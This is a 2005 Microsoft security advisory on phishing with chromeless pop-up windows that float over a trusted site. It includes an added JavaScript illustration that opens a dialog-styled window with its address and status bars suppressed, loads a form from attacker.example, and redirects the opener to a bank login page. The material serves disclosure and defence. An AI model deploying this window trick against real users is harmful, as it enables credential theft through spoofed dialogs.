Security Advisory

Microsoft Security Advisory 902333

Browser Windows Without Indications of Their Origins may be Used in Phishing Attempts

Published: June 21, 2005

Microsoft has investigated a public report of a phishing method that affects Web browsers in general, including Internet Explorer.

The report describes a scenario involving multiple, overlapping browser windows, some of which carry no indication of their origin (no address bar and no lock icon). An attacker could arrange such windows to trick users into treating an unidentified dialog or pop-up window as trustworthy when it is in fact fraudulent. When a user visits a malicious Web site, that site can open an overlapping window styled as a dialog box and then redirect the user's original browser window to a trusted Web site. The user is prompted to enter personal information into the dialog box, which was actually opened by the malicious Web site. Because it floats over the trusted site, the user might believe the trusted site opened it and enter personal information; that information is sent to the malicious Web site.

Customers who already follow our general guidance about avoiding spoofing and phishing attacks are at reduced risk of being affected by this issue. If a particular window or dialog box has no address bar and no lock icon that can be used to verify the site's certificate, the user has no reliable basis for a trust decision about that window or dialog box, regardless of what is visible in the windows around it. To view Microsoft's general guidance about how to avoid spoofing attacks, visit the Security at Home Web site.

We continue to encourage customers to install Windows XP SP2 and to follow our Protect Your PC guidance of enabling a firewall. This includes turning on Automatic Updates to receive software updates and installing antivirus software. For more information, visit the Protect Your PC Web site.

Customers who believe they may have been affected by this phishing method can contact Product Support Services. You can contact Product Support Services in North America at no charge using the PC Safety line (1-866-PCSAFETY). International customers can contact Product Support Services by using one of the methods listed at the Microsoft Security Help and Support for Home Users Web site.

General Information

Overview

Purpose of Advisory: To clarify the risks associated with browser windows without indications of their origins and provide guidance on how to help prevent identity theft from phishing scams.

Advisory Status: Advisory Published, No Security Update Planned.

Recommendation: Review the suggested actions and configure as appropriate.

References:

  • Help prevent identity theft from phishing scams: Security at Home Web site
  • Protect Your PC: Protect Your PC Web site

This advisory applies to the following software.

Related Software
Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3, on Microsoft Windows 2000 Service Pack 4, or on Microsoft Windows XP Service Pack 1
Internet Explorer 6 for Microsoft Windows XP Service Pack 2
Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems, Microsoft Windows Server 2003 with SP1 for Itanium-based Systems, Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium), Microsoft Windows Server 2003 x64 Edition, and Microsoft Windows XP Professional x64 Edition
Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
Internet Explorer 6 Service Pack 1 on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Millennium Edition
Internet Explorer 5.1 for Macintosh

Note: The Web browsers enumerated here are the currently supported Internet Explorer versions. However, this functionality is not limited to Internet Explorer but is common to many Web browsers.

Frequently Asked Questions

What is the scope of the advisory?
This advisory clarifies the current behavior of overlapping windows from different origins in Internet Explorer. This functionality is not limited to Internet Explorer but is common to many Web browsers.

What causes this situation?
Browsers, including Internet Explorer, allow multiple, overlapping windows, and a window opened as a pop-up need not carry an address bar or lock icon that identifies its origin. An attacker can open such a window from a malicious Web site, style it as a dialog box, and then redirect the original browser window to a trusted Web site, so that the pop-up appears to belong to the trusted site. Personal information entered into the pop-up is sent to the malicious Web site, not to the trusted one.
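The window arrangement described in the report and in the answer above, written out as an added illustration. This is not code from Microsoft or from the public report; it stages the sequence against an injectable `win` object so it reads as browser code (pass `window`) and also runs offline under Node with the stub included below. The URLs, the `makeStubWindow` helper and the `demo` function are placeholders chosen for the example.

```javascript
// Added illustration for this advisory, not code from Microsoft or from the
// public report. It stages the window arrangement the advisory describes
// against an injectable `win` object so it can be read as browser code
// (pass `window`) and also run under Node with the stub below. All URLs are
// placeholders.

function dialogFeatures({ width, height, left, top }) {
  // window.open() feature string that removes every origin indicator the
  // advisory tells users to look for: the address bar ("location") and the
  // status bar ("status", where IE 6 showed the lock icon), plus the toolbar
  // and menu bar, so the window looks like a dialog box rather than a page.
  return [
    `width=${width}`, `height=${height}`, `left=${left}`, `top=${top}`,
    "toolbar=no", "location=no", "status=no", "menubar=no", "resizable=no",
  ].join(",");
}

function stageFakeDialog(win, { trustedUrl, formUrl }) {
  // Step 1: from the malicious page, open a small chromeless window that
  // carries the attacker's form, positioned where it will overlap the
  // trusted page's content area.
  const dialog = win.open(formUrl, "dialog",
    dialogFeatures({ width: 360, height: 200, left: 300, top: 250 }));
  // Step 2: navigate the opener, the full window with a real address bar
  // and lock icon, to the trusted site. Those indicators are genuine but
  // describe the window underneath; the floating "dialog" has none of its
  // own, and anything typed into it is submitted to formUrl's origin.
  win.location.href = trustedUrl;
  return dialog;
}

// Minimal stand-in for `window` so the sequence can be exercised offline.
// It records window.open() calls and the final navigation target.
function makeStubWindow(initialUrl) {
  const opened = [];
  return {
    opened,
    location: { href: initialUrl },
    open(url, name, features) {
      opened.push({ url, name, features });
      return { name, closed: false };
    },
  };
}

// Runs the sequence against the stub and reports what a user could verify
// from each window: the opener now shows the trusted URL, while the dialog
// window was opened with its address bar and status bar suppressed.
function demo() {
  const win = makeStubWindow("https://attacker.example/");
  stageFakeDialog(win, {
    trustedUrl: "https://bank.example/login",
    formUrl: "https://attacker.example/dialog.html",
  });
  const features = win.opened[0].features.split(",");
  return {
    openerNowShows: win.location.href,
    dialogLoadedFrom: win.opened[0].url,
    dialogHasAddressBar: !features.includes("location=no"),
    dialogHasStatusBar: !features.includes("status=no"),
  };
}

if (typeof window === "undefined") {
  console.log(demo());
}
```

The point of the check in `demo` is the one the advisory makes for users: the only indicators that can be trusted are the ones attached to the window you are typing into, and the fake dialog has none. Note that browsers released after this advisory (Internet Explorer 7 and Firefox 3 onward) no longer honour `location=no` for script-opened windows and always display the window's own address, so this feature string by itself no longer yields a chromeless pop-up; the guidance to inspect a window's own address bar and certificate before entering data is unchanged.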

Will Microsoft issue a security update to address this threat?
No. This is an example of how current standard Web browser functionality could be used in phishing attempts.

Suggested Actions

For more information about how to help protect yourself online, visit the following Microsoft Web sites:

  • Security at Home Web site (help prevent identity theft from phishing scams)
  • Protect Your PC Web site

Other Information

Resources:

Disclaimer:

The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Revisions:

  • June 21, 2005: Advisory published
